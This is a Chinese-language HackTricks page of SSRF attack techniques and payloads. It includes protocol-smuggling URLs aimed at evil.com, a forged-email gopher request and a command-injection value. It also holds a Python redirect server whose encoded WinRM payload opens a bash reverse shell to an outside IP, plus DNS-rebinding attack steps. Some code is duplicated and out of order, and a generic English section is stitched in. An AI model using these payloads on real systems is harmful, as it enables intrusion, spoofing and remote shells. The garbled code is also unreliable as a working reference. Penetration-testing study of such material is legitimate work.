| .. | ||
| cloud-ssrf.md | ||
| README.md | ||
| ssrf-vulnerable-platforms.md | ||
| url-format-bypass.md | ||
SSRF(服务器端请求伪造)
使用Trickest可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
服务器端请求伪造(也称为SSRF)是一种Web安全漏洞,允许攻击者诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。(来自这里)
捕获SSRF
首先,您需要捕获由您引发的SSRF交互。您可以使用以下工具来捕获HTTP或DNS交互:
- Burpcollab
- pingb
- canarytokens
- interractsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
绕过白名单域
通常,您会发现SSRF仅在某些白名单域或URL中起作用。在下一页中,您可以找到尝试绕过白名单的技术汇编:
{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}
通过开放重定向绕过
如果服务器受到正确的保护,您可以通过利用网页内的开放重定向来绕过所有限制。因为网页将允许对同一域进行SSRF,并且可能会跟随重定向,您可以利用开放重定向使服务器访问任何内部资源。
在此处阅读更多信息:https://portswigger.net/web-security/ssrf
协议
file://
file:///etc/passwd
dict://
DICT URL方案用于引用使用DICT协议可用的定义或单词列表:
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
SFTP://
一种用于通过安全外壳进行安全文件传输的网络协议
ssrf.php?url=sftp://evil.com:11111/
TFTP://
简单文件传输协议,通过UDP工作
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
LDAP://
轻量级目录访问协议。它是一种应用协议,用于在IP网络上管理和访问分布式目录信息服务。
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
使用此协议,您可以指定要服务器发送的IP、端口和字节。然后,您基本上可以利用 SSRF 与任何 TCP 服务器通信(但您需要先了解如何与该服务进行通信)。
幸运的是,您可以使用 Gopherus 为多个服务创建有效载荷。此外,remote-method-guesser 可用于为 Java RMI 服务创建 gopher 有效载荷。
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
Gopher HTTP
Gopher is a protocol that allows the retrieval of documents over the Internet. It was popular in the early days of the web but has since been largely replaced by HTTP. However, Gopher is still supported by some servers and can be used for SSRF attacks.
SSRF (Server-Side Request Forgery) is a vulnerability that allows an attacker to make requests from the server to other internal or external resources. By exploiting SSRF, an attacker can potentially access sensitive information, perform port scanning, or even pivot to other systems within the network.
In the context of SSRF, Gopher can be used as a transport protocol to bypass restrictions and access internal resources. The basic idea is to craft a Gopher URL that points to the desired resource and then make a request to the server using this URL.
To perform a Gopher SSRF attack, follow these steps:
- Identify the SSRF vulnerability in the target application.
- Craft a Gopher URL that points to the desired resource. The URL should follow the format
gopher://<attacker-controlled-IP>:<attacker-controlled-port>/. - Send the crafted Gopher URL as a request to the server.
- Analyze the response from the server to determine if the attack was successful.
It's important to note that Gopher SSRF attacks may not work in all scenarios, as many servers have disabled or restricted Gopher support. Additionally, the success of the attack depends on the specific implementation of the server and the security measures in place.
To mitigate the risk of Gopher SSRF attacks, it is recommended to:
- Implement proper input validation and sanitization to prevent SSRF vulnerabilities.
- Disable or restrict Gopher support on servers that do not require it.
- Regularly update and patch server software to address any known vulnerabilities.
By understanding the Gopher protocol and its potential for SSRF attacks, you can better protect your applications and systems from exploitation.
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
Gopher SMTP — 反向连接到 1337
{% code title="redirect.php" %}
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.
{% endcode %}
SMTP
从 https://twitter.com/har1sec/status/1182255952055164929:
- 使用SSRF连接到smtp localhost:25
- 从第一行获取内部域名 220 http://blabla.internaldomain.com ESMTP Sendmail
- 在github上搜索 http://internaldomain.com ,找到子域名
- 连接
Curl URL globbing - WAF绕过
如果SSRF由curl执行,curl有一个称为URL globbing的功能,可以用于绕过WAF。例如,在这个writeup中,你可以找到一个通过file协议进行路径遍历的示例:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
捕获SSRF请求
- Burp Collaborator
- http://requestrepo.com/
- https://app.interactsh.com/
- https://github.com/stolenusername/cowitness
通过Referrer头实现SSRF
一些应用程序使用服务器端分析软件来跟踪访问者。该软件通常会记录请求中的Referrer头,因为这对于跟踪传入链接特别重要。通常,分析软件实际上会访问出现在Referrer头中的任何第三方URL。这通常是为了分析引用站点的内容,包括传入链接中使用的锚文本。因此,Referer头通常代表了SSRF漏洞的有利攻击面。
要发现这种“隐藏”的漏洞,您可以使用Burp的插件“Collaborator Everywhere”。
通过证书的SNI数据实现SSRF
最简单的配置错误,允许您连接到任意后端,可能如下所示:
stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}
在这里,SNI字段的值直接用作后端的地址。
通过这种不安全的配置,我们可以通过在SNI字段中指定所需的IP或域名来利用SSRF漏洞。例如,以下命令将强制Nginx连接到_internal.host.com_:
openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf
使用Wget上传文件
SSRF与命令注入
可以尝试使用如下负载:url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
PDF渲染
如果网页自动创建了一个包含你提供的一些信息的PDF,你可以插入一些JS代码,这些代码将由PDF创建者(服务器)在创建PDF时执行,从而滥用SSRF。在这里找到更多信息.
从SSRF到DoS
创建多个会话,并尝试利用会话中的SSRF下载大文件。
SSRF PHP函数
{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}
SSRF重定向到Gopher
对于某些利用,您可能需要发送重定向响应(可能使用不同的协议,如gopher)。这里有不同的Python代码用于响应重定向:
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
使用Trickest可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
DNS Rebidding CORS/SOP绕过
如果由于CORS/SOP的限制而无法从本地IP中窃取内容,可以使用DNS Rebidding绕过该限制:
{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}
自动化DNS Rebidding
Singularity of Origin是一种执行DNS rebinding攻击的工具。它包括重新绑定攻击服务器DNS名称的IP地址到目标机器的IP地址以及提供攻击载荷以利用目标机器上的易受攻击的软件所需的组件。
还可以在http://rebind.it/singularity.html上查看公开运行的服务器****
DNS Rebidding + TLS会话ID/会话票证
要求:
- SSRF
- 出站TLS会话
- 本地端口上的内容
攻击步骤:
- 要求用户/机器人访问由攻击者控制的域名
- DNS的TTL为0秒(因此受害者将很快再次检查域名的IP)
- 在受害者和攻击者域之间创建TLS连接。攻击者在会话ID或会话票证中引入载荷。
- 域名将对自身发起无限重定向循环。这样做的目的是使用户/机器人访问该域名,直到再次执行域名的DNS请求。
- 在DNS请求中,现在给出了私有IP地址(例如127.0.0.1)
- 用户/机器人将尝试重新建立TLS连接,为此它将发送会话ID/票证ID(其中包含了攻击者的载荷)。恭喜,您成功地要求了用户/机器人攻击自己。
请注意,在此攻击期间,如果要攻击localhost:11211(memcache),您需要使受害者与www.attacker.com:11211(端口必须始终相同)建立初始连接。
要执行此攻击,可以使用以下工具:https://github.com/jmdx/TLS-poison/
有关此攻击的更多信息,请参阅解释此攻击的讲座:https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
盲SSRF
盲SSRF和非盲SSRF的区别在于,在盲SSRF中,您无法看到SSRF请求的响应。因此,它更难以利用,因为您只能利用已知的漏洞。
基于时间的SSRF
通过检查服务器响应的时间,可以确定是否存在某个资源(访问现有资源可能比访问不存在的资源需要更长的时间)
云SSRF利用
如果在云环境中运行的机器中发现了SSRF漏洞,您可能能够获取有关云环境甚至凭据的有趣信息:
{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}
SSRF易受攻击的平台
一些已知平台包含或曾包含SSRF漏洞,请在以下位置检查它们:
{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}
工具
SSRFMap
用于检测和利用SSRF漏洞的工具
Gopherus
此工具可为以下内容生成Gopher载荷:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
remote-method-guesser
_remote-method-guesser_是一种支持大多数常见_Java RMI_漏洞的攻击操作的_Java RMI_漏洞扫描工具。大多数可用操作都支持--ssrf选项,以生成所请求操作的_SSRF_载荷。结合--gopher选项,可以直接生成可用的_gopher_载荷。
SSRF Proxy
SSRF Proxy是一个多线程HTTP代理服务器,旨在通过对易受Server-Side Request Forgery (SSRF)攻击的HTTP服务器进行隧道传输客户端HTTP流量。
练习
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
参考资料
- https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看SUBSCRIPTION PLANS!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或 Telegram群组 或 关注我的Twitter 🐦@carlospolopm。
- 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享您的黑客技巧。
使用Trickest轻松构建和自动化工作流程,利用世界上最先进的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}